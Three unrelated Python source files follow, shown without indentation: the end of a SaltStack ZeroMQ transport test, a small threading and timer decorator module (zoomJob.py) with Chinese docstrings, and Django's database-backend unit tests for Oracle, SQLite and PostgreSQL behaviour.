raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
def get_new_ioloop(self):
return zmq.eventloop.ioloop.ZMQIOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super(AsyncReqMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch('salt.transport.zeromq.AsyncReqMessageClient.__init__', MagicMock(return_value=None)):
self.message_client_pool = AsyncReqMessageClientPool({'sock_pool_size': sock_pool_size},
args=({}, ''))
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [MagicMock() for _ in range(sock_pool_size)]
def tearDown(self):
with patch('salt.transport.zeromq.AsyncReqMessageClient.destroy', MagicMock(return_value=None)):
del self.original_message_clients
super(AsyncReqMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_destroy(self):
self.message_client_pool.destroy()
self.assertEqual([], self.message_client_pool.message_clients)
|
zoomJob.py
|
#_*_ coding: utf8 _*_
import sqlite3,os
import zoom
from threading import Thread
from functools import wraps
from time import sleep
__doc__=u''''
zoomJob.py 实现简单的对任务的定制
python 版本需求 2.7以上
无第三方模块需求
'''
def asy(func):
u'''
修饰器,异步函数
被修饰的函数单独作为一个线程,可以异步执行
示例如下所示:
>>> @asy
... def loop1():
... while True:
... time.sleep(1)
... print 'loop1'
... def loop2():
... while True:
... time.sleep(1)
... print 'loop2'
... loop1()
... loop2()
loop1
loop2
loop2
lopp1
...
'''
@wraps(func)
def wrapper(*args,**kwargs):
t=Thread(target=func,args=args,kwargs=kwargs)
t.start()
return t
return wrapper
def timer(second=1,minute=0,hour=0,day=0):
u'''
修饰器,提供定时功能
示例如下所示:
>>> from zoom import *
... from zoomJob import *
... @timer
... def job():
... print "This is a job"
... job()
This is a job
This is a job
...
'''
time=second*1+minute*60+hour*3600+day*3600*24
def real_wrapper(func):
@wraps(func)
@asy
def wrapper(*args,**kwargs):
while(True):
sleep(time)
func(*args,**kwargs)
return wrapper
return real_wrapper
if __name__=='__main__':
import time
@asy
def loop1():
while True:
time.sleep(1)
print 'loop1'
def loop2():
while True:
time.sleep(1)
print 'loop2'
loop1()
loop2()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
TestCase, TransactionTestCase, mock, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
def test_memory_db_test_name(self):
"""
A named in-memory db should be allowed where supported.
"""
from django.db.backends.sqlite3.base import DatabaseWrapper
settings_dict = {
'TEST': {
'NAME': 'file:memorydb_test?mode=memory&cache=shared',
}
}
wrapper = DatabaseWrapper(settings_dict)
creation = wrapper.creation
if creation.connection.features.can_share_in_memory_db:
expected = creation.connection.settings_dict['TEST']['NAME']
self.assertEqual(creation._get_test_db_name(), expected)
else:
msg = (
"Using a shared memory database with `mode=memory` in the "
"database name is not supported in your environment, "
"use `:memory:` instead."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
creation._get_test_db_name()
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_nodb_connection(self):
"""
Test that the _nodb_connection property fallbacks to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
del connection._nodb_connection
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
del connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], settings.DATABASES[DEFAULT_DB_ALIAS]['NAME'])
# Check a RuntimeWarning nas been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
